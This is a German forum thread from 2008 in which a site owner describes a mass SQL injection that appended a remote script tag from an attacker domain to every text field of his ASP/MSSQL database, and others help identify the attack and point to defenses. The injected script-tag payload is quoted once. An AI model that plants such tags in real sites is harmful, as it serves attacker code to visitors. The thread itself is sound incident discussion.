Zur Navigation

Großer Spamangriff von banner82.com

1 Rudy

Hallo,

mit Erschrecken habe ich heute festgestellt, dass eine unserer Firmenwebsites einem großen Spamangriff zum Opfer gefallen ist. Dass wir nicht die einzigen sind, zeigt diese Google-Suche...

Irgendwie hat es der Angreifer geschafft, in das CMS zu gelangen und an jedes Varchar/Text-Feld den String
<script src=http://www.banner82.com/b.js></script>
dranzuhängen - natürlich in der Hoffnung, dass irgendwo auf der Seite etwas ausgegeben wird, was nicht HTML-Kodiert wird - das hat er auch geschafft.

Zum Glück haben alle unsere Datenbanken ein tägliches Backup, sodass das Malheur binnen 5min behoben war - es bleibt der bittere Nachgeschmack, dass ich keinen Schimmer habe, wie er da rein kommen konnte, alle Textfelder der Datenbank auszuspionieren imstande war und dann noch Queries absetzen konnte. Wenn ich das bloß wüsste... jemand von euch eine Idee?

Ich gehe ja davon aus, dass ein Angriff zumeist über Formulare ausgeübt wird, wo aus Benutzereingaben Datenbankqueries geformt werden. Die sind aber natürlich alle sorgfältig escaped und decken mit Sicherheit nicht die gesamte Datenbank ab, sondern nur eine Tabelle (die der Newsletter-Anmeldung, wo Name und Empfänger gespeichert werden). Aber der Spammer hat tatsächlich ALLE Tabellen (bis auf die CMS-Benutzer) gefunden und manipuliert. Wie ist das bloß möglich?

21.05.2008 22:40 | geändert: 21.05.2008 22:43

2 Jörg

Ist das CMS eine Eigenentwicklung - oder eine Software, die auch andere nutzen - vielleicht auch die anderen betroffenen Seiten? Dabei scheint es sich auf den ersten Blick wohl durchgängig um .asp Seiten zu handeln?

Ende April gab es ja schon mal einen Massenhack von .asp Seiten:

http://www.heise.de/security/Hunderttausende-Webseiten-mit-schaedlichem-JavaScript-infiziert--/news/meldung/106959

Entschlüsselt handelt es sich um eine SQL-Abfrage, die alle Textfelder in der Datenbank hinter der Webseite finden und den JavaScript-Code dort einschleusen soll

Das scheint ja zu passen?

Diese Meldung gehört wohl auch noch dazu:

http://www.heise.de/security/Microsoft-gibt-Hilfestellung-gegen-Massen-SQL-Injection--/news/meldung/107087

21.05.2008 23:22

3 Rudy

Danke! Mit diesen Informationen kann ich einen Filter bauen und überall einschleusen. Kleinigkeit. Also doch eine SQL-Injection... wo sich die Schwachstelle nur verbirgt? Irgendwo muss der Hund sein... Vorerst werde ich mit einem Blacklist-Filter es künftigen Angriffen gehörig schwerer machen und dann nach der Lücke suchen.

Dabei scheint es sich auf den ersten Blick wohl durchgängig um .asp Seiten zu handeln?

Stimmt, alles ASP-Seiten. War mir auf den ersten Blick gar nicht aufgefallen. Die neuen Seiten sind zum Glück alle auf PHP-Basis mit meinen Datenbank-Klassen, wo sowas garantiert nicht funktioniert. Leider haben wir noch zig meiner verhassten ASP-Dinger, die alle auf ASP Classic bauen. Das wird ein Stück Arbeit alle mit dem Filter-Include auszustatten :/ Also doch nicht so ganz eine Kleinigkeit...

Edit:
Wobei, die Query ist MSSQL... das grenzt die gefährdeten Seiten auf unter 10 ein, die anderen alten haben alle solche Access-Dinger, wo sowas sicher nicht geht. Es gibt noch Hoffnung.

21.05.2008 23:34 | geändert: 21.05.2008 23:53

5 patrick (Gast)

schau im msdn unter sql injection nach
und überprüfe die variablen die du entgegennimmst und droppe ggf. fehleingaben

30.05.2008 19:29

6 Rudy

Schon klar, danke :) Inzwischen sind die Seiten abgesichert, ich habe seitdem auch keinen neuen Angriff registriert.

30.05.2008 19:47

Beitrag schreiben (als Gast)

Beim Verfassen des Beitrages bitte die Forenregeln beachten.





[BBCode-Hilfe]